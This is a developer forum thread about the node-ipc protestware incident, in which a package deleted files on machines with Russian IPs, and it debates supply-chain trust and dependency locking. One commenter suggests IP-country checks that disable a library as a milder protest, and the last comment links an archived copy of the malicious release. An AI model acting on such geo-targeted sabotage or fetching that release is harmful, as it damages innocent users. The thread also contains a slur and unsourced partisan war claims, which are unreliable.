Yeah, well, the illusion that only the perception of 1337 coders matters on the subject is naive. A relatively small and isolated incident like this still sends a very strong message, and not in a good way. I'm aware that I'm being a bit overdramatic here, but the point still stands.

@forresthopkinsa cant read it, its paid so opinion discarded
@ner00 It literally wont change a thing. OSS is used in so many places that replacing it is virtually impossible. I am really tired of arguing with you people. Go ahead and stop using any OSS project if you want. Might as well not program at all since pretty much every programming language I know of is OSS. But I guess I am to 1337 to get your 180 IQ take.

How about we stop using linux and FreeBSD altogether because some javascript idiot uploaded malware to npm. Absolute retard take.

I am really tired of arguing with you people.

I'm sorry, wasn't aware given how involved you seem. You did understand the dig I made at your arrogance, which is good.

You are absolutely right about me being more involved than I should.

@MidSpike has put together quite good overview of the problem.
As @noblehng brought up the package manager probably should do some more checks on popular packages, but that means there has to be some financing to be able to make the review system happen in there. This is not only NPM and JS problem. Probably if package crosses some critical mass of usage then it should start to go through review system before published in package managers. I would say that even Log4j could have used something like that where this "code safety" organization tries to find vurneabilities or malicious pieces of code before it gets to shipped to those who haven't done proper dependency locking.

I understand @RIAEvangelist point partly as well and this dependency is biggest platform he had available to use to express his opinion. Creating file on desktop would have been just annoyance and I guess the backlash wouldn't have been as big. Deleting files was pretty bad, if I wouldn't have done that, but for really showing your dislike the easiest and a lot less harmful way would have been to just check if IP in x country and then put in log message and not run functions of that dependency. That would still have been annoying, but not as destructive as deleting files.

It is and will be problem in OSS. The supply-chain poisoning will be a problem if there is some conflict in author's interests and we all have our own opinions. Currently only way for you not to be affected by them would be to not use 3rd party dependencies or lock versions to known and safe packages. First one would mean a lot of reinventing wheel for companies and slowing innovation. Second one is what developers should do and bump versions only after verified. It also could slow down development a bit, but not as much.

From Brandon's repo comments I am really disappointed in IQ of dev community.

• The harassment of his employee, Swatting, etc. is not ok still. If you have proof that the code change he did caused harm, then gather it and sue him.
• Distribution of this package and "Malware" in my eyes lies on NPM and software that has it as dependency. Technically he did not push the package to you, but you pulled from package manager.
• Talking about children's hospital now suddenly not working and respirators not working... Huh? Why would they use node in respirator system or in any life-critical system at all.
• The claim about some American NGO losing all it's files seems fake to me, just to blow things out of portions. For that to happen that NGO has to make so many mistakes to make it possible to lose all the data in 1 go, like lack of backups and developing and building code with no review or test process in production servers. In order for malicious package to get to production servers there should be some kind of development process that involves test period. If either one of those is missing or broken, then it is not package that is at fault, but business process first. Yes package should not contain such code, but to blame repo maintainer in series of issues in organization where package author has no say in changing seems wrong.
• Personal insults, calling names is something that was done in elementary school and is seen as sign if immaturity than intelligence. Intelligent people insult in more subtle ways. So show you are smart and mature. I personally thought software developers were supposed to be smart people, but for now some rotten apples have broken that illusion.
• There were some comments about journalists and different other profession people being affected... I do not see quite how, the most likely for you to be affected is when you had Unity Hub installed or doing software development. Unity Hub issue is them not doing proper dependency management. I do not see how this package would have gotten to all those journalists computers, are they part-time JS developers?

Whoever thinks the ordinary Russian citizen is innocent and should not suffer because of their leader, then think, why does ordinary Ukrainian has to suffer because of leader of some other country. Ordinary Russian is in that case less innocent than ordinary Ukrainian.

@ShikiSuen one journalist shows how people of whole nation are? He seems like one rotten apple to ruin the bunch. His name is not Ukrainian, from the looks I doubt he is part of Ukrainian culture or should be listened as representative of whole nation. Ukrainian president is chosen to be the "face" of whole nation and I have not heard him calling for genocide. From what I have seen is that he asks for Russian troops to go back to russia to save their lives because Ukrainians will protect themselves in Ukraine. There is difference in protecting your own country and attacking another one. In current case Russian army is the one who has bombed and killed Ukrainian people, including children, while children of Russia are safe in Russia.

@krisavi The massacre in the East Ukraine started years ago prior to Russian invasion.
I'm not about to blame Zelensky for that since Zelensky doesn't have enough control to what happened there.
The Azov Battalion is the one to blame.

What I can hope is that the Azov Battalion gets evaporated as earlier as possible so Russian troops can be pulled out ouf Ukraine earlier.
The war itself is a disaster, still.

@krisavi It won't affect OSS. This is strictly a JS/NPM problem. I am unsure why you people think this, maybe you could elaborate.
In general, the issue is with package managers of any sort. We have traded convenience for security.

On a side note, if this malware wasn't OSS, it would very likely be deleting files to this day. So even though it is malware, because its open source, people could identify the issue faster. Just image this package to be closed-source proprietary software. The damage would be continuing, and we wouldn't be here discussing it.

@krisavi

How do you test for Russian IP in the EU or USA? Do you test your code for every region in the world?

Package managers are built on a certain level of trust. It's unethical and sets a dangerous precedent in the developer community to convert your package into malware. If you want to make a statement, put a big disclaimer in the README. You can send a message without putting everyone at risk.

This could easily go wrong and affect people outside of the targets. Not every developer works for a big corporation with measures in place to deal with this kind of disaster. You could easily be wiping out months of work for a little mom-and-pop business in New Zealand, innocent people that don't know any better.

Now every popular package developer that has a statement to make will be thinking about this kind of tactic. It's the same with faker.js and unfortunately, any developer that does this will be damaged goods for the rest of their career.

On the topic of making statements, there was an incident over two years ago as well where packages started displaying ads when installed, which was NPM soon declared be disallowed.

For me personally though, the most unsettling thing about this attack is that node-ipc is actually run on personal computers by hobbiest vue users, and it might have been able to delete synced OneDrive, Dropbox, etc. files.

Given how much idiotic conspiracy theorists here, Russian propaganda works well even outside of Russia. This is really sad for me as a Russian, that even outside of this information prison people manage to fall to the most obvious lies.

welcome to earth

The guy purged his github repo and republished it with help from github to kill all the old hashes..
RIAEvangelist/node-ipc#3
The versions live on noderpm still can deliver malware, as issue states.

My archive is still live for posterity reasons. Here is the release of the code he pushed:
https://github.com/samuelmattjohnston/node-ipc/releases/tag/v10.1.3
samuelmattjohnston/node-ipc@847047c